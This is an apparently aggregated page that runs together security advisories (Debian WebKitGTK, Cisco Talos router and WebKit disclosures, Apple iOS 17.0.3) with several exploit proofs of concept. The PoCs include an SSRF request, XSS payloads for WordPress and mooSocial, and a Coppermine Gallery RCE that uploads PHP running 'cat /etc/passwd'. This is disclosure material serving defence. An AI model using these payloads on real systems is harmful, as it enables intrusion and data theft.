Debian Linux Security Advisory 5527-1 - Marcin Noga discovered that a specially crafted web page can abuse a vulnerability in the MediaRecorder API to cause memory corruption and potentially arbitrary code execution. Junsung Lee and Me Li discovered that processing web content may lead to arbitrary code execution. Bill Marczak and Maddie Stone discovered that processing web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5527-1                   security@debian.org  
https://www.debian.org/security/                           Alberto Garcia  
October 12, 2023                      https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : webkit2gtk  
CVE ID         : CVE-2023-39928 CVE-2023-41074 CVE-2023-41993

The following vulnerabilities have been discovered in the WebKitGTK  
web engine:

CVE-2023-39928

    Marcin Noga discovered that a specially crafted web page can abuse  
    a vulnerability in the MediaRecorder API to cause memory  
    corruption and potentially arbitrary code execution.

CVE-2023-41074

    Junsung Lee and Me Li discovered that processing web content may  
    lead to arbitrary code execution.

CVE-2023-41993

    Bill Marczak and Maddie Stone discovered that processing web  
    content may lead to arbitrary code execution. Apple is aware of a  
    report that this issue may have been actively exploited.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 2.42.1-1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 2.42.1-1~deb12u1.

We recommend that you upgrade your webkit2gtk packages.

For the detailed security status of webkit2gtk please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/webkit2gtk

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEYrwugQBKzlHMYFizAAyEYu0C2AIFAmUoSJAACgkQAAyEYu0C  
2AI3Xg//YRhE5mSszGaNvp7i/2KXs4xBSP4k8mJ+EG2SDOKxIeiu2HU5PhGmhrSp  
PmJE3xFU5R2mov03nwu0yPKve6iijgYdh1evPBgSdexLJjJciasu5GtIl+MAmrq1  
r7qVro8GabC4Ul4ALRp7k3qxFR2+wPD1jfFlKHavxpc8gSmfBLlLoOwfsNhmXXz5  
eI87n7tbp35/nDv1m/VU/BkQh1LWqGQlO7sU25I/y2Vz/5SMyYuwjquSIVOkxVYm  
UM2QntYVuRO+sooZHSDzjBpB4Wn99jWAPq7jYwec7tmATKE/Yea3rQQ7b5b6rk+t  
Pp+TDsjx17uL3c656rGrf5vy0F4udxgCtRvEXCpf2Dn2DLKV3xudKwn99cwj2Vco  
4fKZLjtbpLUqCtbcGZ3OhSHNatbXW6lvdAlb/vQI/N5TDwVHQlRygUSVGumiO6T9  
eNCVc/IEUeyD7hfpcUglMNXroxaFelViAfjadj5NrOsbS0eRgfzhSAFY0MwE7quC  
0j1RgfNgM6RmkWEyWzLjHcmDr+eX2SFDRAcb+re6EoAAzuIY22Db+SlXgTiVBIPv  
bIu++eOnIo92uUKjFaKCXF6NGEBRhkYx5MpdRXGw0ehVuZ4ueWvuZAcFC5z5GSMN  
o36hFYQ/p8K06OFuBKzP9ce76BXsGWIBQiDz1mbP69E4jwBT3b4=oxcS  
-----END PGP SIGNATURE-----

Debian Security Advisory 5527-1

Attackers could exploit these vulnerabilities in the Yifan YF325 to carry out a variety of attacks, in some cases gaining the ability to execute arbitrary shell commands on the targeted device.

Wednesday, October 11, 2023 12:10

Cisco Talos recently disclosed 11 vulnerabilities, 10 of which are zero-days without a patch in an industrial cellular router. 

Attackers could exploit these vulnerabilities in the Yifan YF325 to carry out a variety of attacks, in some cases gaining the ability to execute arbitrary shell commands on the targeted device.  

The one other security issue Talos has disclosed over the past two weeks is a use-after-free vulnerability in an open-source port of WebKit, a popular content rendering engine used in popular web browsers like Apple Safari. 

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.  

**Yifan YF325 **

_Discovered by Francesco Benvenuto._ 

The Yifan YF325 is a cellular terminal device that offers Wi-Fi and ethernet connectivity capabilities to a network.  

The company’s website says the YF325, “has been widely used on M2M fields, such as self-service terminal industry, intelligent transportation, smart grid, industrial automation, telemetry, finance, POS, water supply, environment protection, post, weather, and so on.” 

Talos recently discovered 10 vulnerabilities in this device an adversary could exploit to carry out a variety of malicious actions, including TALOS-2023-1767 (CVE-2023-32632), which could allow an attacker to execute arbitrary shell commands on the targeted device. 

TALOS-2023-1762 (CVE-2023-24479) is perhaps the most serious of the set of vulnerabilities with a CVSS severity score of 9.8 out of 10. An attacker could exploit this vulnerability to change the admin credentials of the device and obtain root access. TALOS-2023-1752 (CVE-2023-32645) is also an authentication bypass vulnerability, but in this case, an attacker could simply use leftover debug credentials to log in as an administrator. 

The remaining vulnerabilities Talos disclosed in this product this week are buffer overflow vulnerabilities all triggered by specially crafted network requests: 

*   TALOS-2023-1761 (CVE-2023-35055 and CVE-2023-35056) 
*   TALOS-2023-1763 (CVE-2023-34365) 
*   TALOS-2023-1764 (CVE-2023-34346) 
*   TALOS-2023-1765 (CVE-2023-31272) 
*   TALOS-2023-1766 (CVE-2023-34426) 
*   TALOS-2023-1787 (CVE-2023-35965 and CVE-2023-35966) 
*   TALOS-2023-1788 (CVE-2023-35967 and CVE-2023-35968) 

All these vulnerabilities also have a severity score of 9.8. 

Talos is disclosing these vulnerabilities despite no official patch from Yifan, all in adherence to Cisco’s third-party vendor vulnerability disclosure policy. 

**Use-after-free vulnerability in WebKitGTK **

_Discovered by Marcin “Icewall” Noga._ 

Talos recently disclosed a use-after-free vulnerability in WebKitGTK’s MediaRecorder API. 

WebKitGTK is a full-featured, open-source port of the WebKit rendering engine. 

TALOS-2023-1831 (CVE-2023-39928) could lead to remote code execution, if the targeted user opens an attacker-controlled, malicious web page using an application that utilizes the affected version of WebKitGTK.

10 zero-day vulnerabilities in industrial cell router could lead to code execution, buffer overflows

Webedition CMS version 2.9.8.8 suffers from a blind server-side request forgery vulnerability.

    Exploit Title: Webedition CMS v2.9.8.8 - Blind SSRFApplication: Webedition CMSVersion: v2.9.8.8   Bugs:  Blind SSRFTechnology: PHPVendor URL: https://www.webedition.org/Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1Date of found: 07.09.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================write https://youserver/test.xml to we_cmd[0] parameterpoc requestPOST /webEdition/rpc.php?cmd=widgetGetRss&mod=rss HTTP/1.1Host: localhostContent-Length: 141sec-ch-ua: Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36sec-ch-ua-platform: ""Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/webEdition/index.php?we_cmd[0]=startWEAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: treewidth_main=300; WESESSION=41a9164e60666254199b3ea1cd3d2e0ad969c379; cookie=yep; treewidth_main=300Connection: closewe_cmd[0]=https://YOU-SERVER/test.xml&we_cmd[1]=111000&we_cmd[2]=0&we_cmd[3]=110000&we_cmd[4]=&we_cmd[5]=m_3

Webedition CMS 2.9.8.8 Server-Side Request Forgery

WordPress Sonaar Music plugin version 4.7 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Wordpress Sonaar Music Plugin 4.7 - Stored XSS# Date: 2023-09-05# Exploit Author: Furkan Karaarslan# Category : Webapps# Vendor Homepage: http://127.0.0.1/wp/wordpress/wp-comments-post.php# Version: 4.7 (REQUIRED)# Tested on: Windows/Linux----------------------------------------------------------------------------------------------------1-First install sonar music plugin.2-Then come to the playlist add page. > http://127.0.0.1/wp/wordpress/wp-admin/edit.php?post_type=sr_playlist3-Press the Add new playlist button4-Put a random title on the page that opens and publish the page. > http://127.0.0.1/wp/wordpress/wp-admin/post-new.php?post_type=sr_playlist5-This is the published page http://127.0.0.1/wp/wordpress/album_slug/test/6-Let's paste our xss payload in the comment section. Payload: <script>alert("XSS")</script>BingooRequest:POST /wp/wordpress/wp-comments-post.php HTTP/1.1Host: 127.0.0.1Content-Length: 155Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://127.0.0.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://127.0.0.1/wp/wordpress/album_slug/test/Accept-Encoding: gzip, deflateAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7Cookie: comment_author_email_52c14530c1f3bbfa6d982f304802224a=a%40gmail.com; comment_author_52c14530c1f3bbfa6d982f304802224a=a%22%26gt%3Balert%28%29; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_52c14530c1f3bbfa6d982f304802224a=hunter%7C1694109284%7CXGnjFgcc7FpgQkJrAwUv1kG8XaQu3RixUDyZJoRSB1W%7C16e2e3964e42d9e56edd7ab7e45b676094d0b9e0ab7fcec2e84549772e438ba9; wp-settings-time-1=1693936486Connection: closecomment=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&submit=Yorum+g%C3%B6nder&comment_post_ID=13&comment_parent=0&_wp_unfiltered_html_comment=95f4bd9cf5

WordPress Sonaar Music 4.7 Cross Site Scripting

Coppermine Gallery version 1.6.25 remote code execution exploit.

    Exploit Title: coppermine-gallery 1.6.25 RCEApplication: coppermine-galleryVersion: v1.6.25  Bugs:  RCETechnology: PHPVendor URL: https://coppermine-gallery.net/Software Link: https://github.com/coppermine-gallery/cpg1.6.x/archive/refs/tags/v1.6.25.zipDate of found: 05.09.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps1.First of All create php file content as <?php echo system('cat /etc/passwd'); ?> and sequeze this file with zip.$ cat >> test.php <?php echo system('cat /etc/passwd'); ?>$ zip test.zip test.php1. Login to account2. Go to http://localhost/cpg1.6.x-1.6.25/pluginmgr.php3. Upload zip file4. Visit to php file   http://localhost/cpg1.6.x-1.6.25/plugins/test.phppoc requestPOST /cpg1.6.x-1.6.25/pluginmgr.php?op=upload HTTP/1.1Host: localhostContent-Length: 630Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryi1AopwPnBYPdzorFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/cpg1.6.x-1.6.25/pluginmgr.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: cpg16x_data=YTo0OntzOjI6IklEIjtzOjMyOiI0MmE1Njk2NzhhOWE3YTU3ZTI2ZDgwYThlYjZkODQ4ZCI7czoyOiJhbSI7aToxO3M6NDoibGFuZyI7czo3OiJlbmdsaXNoIjtzOjM6ImxpdiI7YTowOnt9fQ%3D%3D; cpg16x_fav=YToxOntpOjA7aToxO30%3D; d4e0836e1827aa38008bc6feddf97eb4=93ffa260bd94973848c10e15e50b342cConnection: close------WebKitFormBoundaryi1AopwPnBYPdzorFContent-Disposition: form-data; name="plugin"; filename="test.zip"Content-Type: application/zipPK�����™b%Wz½µ}(���(�����test.phpUT  �ñòödÓòödux���������<?php echo system('cat /etc/passwd');?>PK�����™b%Wz½µ}(���(������������¤����test.phpUT�ñòödux���������PK������N���j�����------WebKitFormBoundaryi1AopwPnBYPdzorFContent-Disposition: form-data; name="form_token"50982f2e64a7bfa63dbd912a7fdb4e1e------WebKitFormBoundaryi1AopwPnBYPdzorFContent-Disposition: form-data; name="timestamp"1693905214------WebKitFormBoundaryi1AopwPnBYPdzorF--

Coppermine Gallery 1.6.25 Remote Code Execution

Cross Site Scripting (XSS) vulnerability in mooSocial v.3.1.8 allows a remote attacker to execute arbitrary code via a crafted payload to the admin_redirect_url parameter of the user login function.

A reflected cross-site scripting (XSS) vulnerability in the **admin\_redirect\_url** parameter on user login function of mooSocial v3.1.8 which allows attackers to steal admin's session cookies and impersonate their account via a crafted URL.

    Payload : "><script>alert(1)</script> 
    FINAL Payload (URL encoded) : test%22%3e%3cscript%3ealert(1)%3c%2fscript%3etest
    

    GET /moosocial/admin/home/login?admin_redirect_url=aHR0cDovL2xvY2FsaG9zdC9tb29zb2NpYWwvYWRtaW4vcGx1Z2lucw%22%3e%3cscript%3ealert(1)%3c%2fscript%3etest HTTP/1.1
    Host: localhost
    Accept-Encoding: gzip, deflate, br
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.63 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Cookie: CAKEPHP=nidqufo1vqbqircuufs0mh98m4; 19edc47bb57545288d88183ca75c9a0bmooSocial[theme]=Q2FrZQ%3D%3D.7AxYtZYvgA%3D%3D
    Upgrade-Insecure-Requests: 1
    Referer: http://745f1976-76bd-42e5-9ece-01e2ad60316d.com/
    Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="117", "Chromium";v="117"
    Sec-CH-UA-Platform: Windows
    Sec-CH-UA-Mobile: ?0

CVE-2023-44812: GitHub - ahrixia/CVE-2023-44812: mooSocial v3.1.8 is vulnerable to cross-site scripting on Admin redirect function.

Cross Site Scripting (XSS) vulnerability in mooSocial v.3.1.8 allows a remote attacker to execute arbitrary code via a crafted payload to the mode parameter of the invite friend login function.

A reflected cross-site scripting (XSS) vulnerability in the **mode** parameter on Invite Friend function of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.

    Payload : ');alert(1)//
    FINAL Payload (URL encoded) : %27)%3balert(1)%2f%2f
    

    GET /moosocial/friends/ajax_invite?mode=model%27)%3balert(1)%2f%2f;' HTTP/1.1
    Host: localhost
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="117", "Not;A=Brand";v="8"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.63 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    Cookie: 19edc47bb57545288d88183ca75c9a0bmooSocial[activity_feed]=Q2FrZQ%3D%3D.7R9bpposmi8%3D
    Connection: close

CVE-2023-44813: GitHub - ahrixia/CVE-2023-44813: mooSocial v3.1.8 is vulnerable to cross-site scripting on Invite Friend function.

A use-after-free vulnerability exists in the MediaRecorder API of Webkit WebKitGTK 2.40.5. A specially crafted web page can abuse this vulnerability to cause memory corruption and potentially arbitrary code execution. A user would need to to visit a malicious webpage to trigger this vulnerability.

CVE-2023-39928: TALOS-2023-1831 || Cisco Talos Intelligence Group

Apple Security Advisory 2023-10-04-1 - iOS 17.0.3 and iPadOS 17.0.3 addresses buffer overflow and code execution vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2023-10-04-1 iOS 17.0.3 and iPadOS 17.0.3iOS 17.0.3 and iPadOS 17.0.3 addresses the following issues.Information about the security content is also available athttps://support.apple.com/kb/HT213961.Apple maintains a Security Updates page athttps://support.apple.com/HT201222 which lists recentsoftware updates with security advisories.KernelAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: A local attacker may be able to elevate their privileges. Appleis aware of a report that this issue may have been actively exploitedagainst versions of iOS before iOS 16.6.Description: The issue was addressed with improved checks.CVE-2023-42824WebRTCAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: A buffer overflow may result in arbitrary code executionDescription: The issue was addressed by updating to libvpx 1.13.1.WebKit Bugzilla: 262365CVE-2023-5217This update is available through iTunes and Software Update on youriOS device, and will not appear in your computer's Software Updateapplication, or in the Apple Downloads site. Make sure you have anInternet connection and have installed the latest version of iTunesfrom https://www.apple.com/itunes/  iTunes and Software Update on thedevice will automatically check Apple's update server on its weeklyschedule. When an update is detected, it is downloaded and the optionto be installed is presented to the user when the iOS device isdocked. We recommend applying the update immediately if possible.Selecting Don't Install will present the option the next time youconnect your iOS device.  The automatic update process may take up toa week depending on the day that iTunes or the device checks forupdates. You may manually obtain the update via the Check for Updatesbutton within iTunes, or the Software Update on your device.  Tocheck that the iPhone, iPod touch, or iPad has been updated:  *Navigate to Settings * Select General * Select About. The versionafter applying this update will be "iOS 17.0.3 and iPadOS 17.0.3".All information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmUd15wACgkQX+5d1TXaIvqEoQ/+PIrFp2opkANUwD7d+pcGVnkS4fK7lGqqG6FMpuGuRhf8E+lf/SVAMzcKbXfFLhb+Fs/Z+81RKwy3xmC/kHis9K/SWaMFsTW0ctfeU83hSMIQ+JI0wvfnJy/c8thYA6u151HqJdAZKruyphTz4OEq2eUJqvPXGxiHNWyjfCacpmLnUt24WbVTL4CaGqX3tRsJLCH4XEJ/hYXNBZUolwdz4vFUG1P9OsjzOaTSIt0sVg/LZK5MTu7tcvEEBKXu9Rsfkq1KgXy6E3xo5/nkyZiMBvOLoWIPNq2BYA5Hw2V2wow6mPEpqaMPTsuFEMRJ0wqJfQwBtuRtdRt+mNJRE62+4lTfuDGEgvYlasGCqw2t180eiXQHtjoGBEwgXJ0rsjADZtTGnmEir2r/P+bRajtQRAmsVf1zhSpSksHib/3CFlin3dsLqB48lPCYy4K72u6vGrISKehm7bT3i5cxMD9ktcDEUd3TP4BjSHruttRb95UnQmQHlr6X68JAL2iT20POFpa6U8PBlgRTOKOL251lB3Ri+Q/TIO0KtTj6d6SIWAxdOyPtaHM458l3oUeexzEd7U8afA4LdITYwlETsFau/HTdky/CJjnVAaigtvnOBbrK8AIGPG2lOLwm2KiNvElbQ2M/JokxOahO/+f/PYWKOIzyVYnQA8xfP2cVSg9fqAA=eLl5-----END PGP SIGNATURE-----

Apple Security Advisory 2023-10-04-1

The issue was addressed with improved checks. This issue is fixed in iOS 17.0.3 and iPadOS 17.0.3. A local attacker may be able to elevate their privileges. Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 16.6.

This document describes the security content of iOS 17.0.3 and iPadOS 17.0.3.

**About Apple security updates**

For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the Apple security releases page.

Apple security documents reference vulnerabilities by CVE-ID when possible.

For more information about security, see the Apple Product Security page.

**iOS 17.0.3 and iPadOS 17.0.3**

Released October 4, 2023

**Kernel**

Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later

Impact: A local attacker may be able to elevate their privileges. Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 16.6.

Description: The issue was addressed with improved checks.

CVE-2023-42824

**WebRTC**

Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later

Impact: A buffer overflow may result in arbitrary code execution

Description: The issue was addressed by updating to libvpx 1.13.1.

WebKit Bugzilla: 262365  
CVE-2023-5217

Information about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. Contact the vendor for additional information.

Published Date: October 04, 2023

Tag

#webkit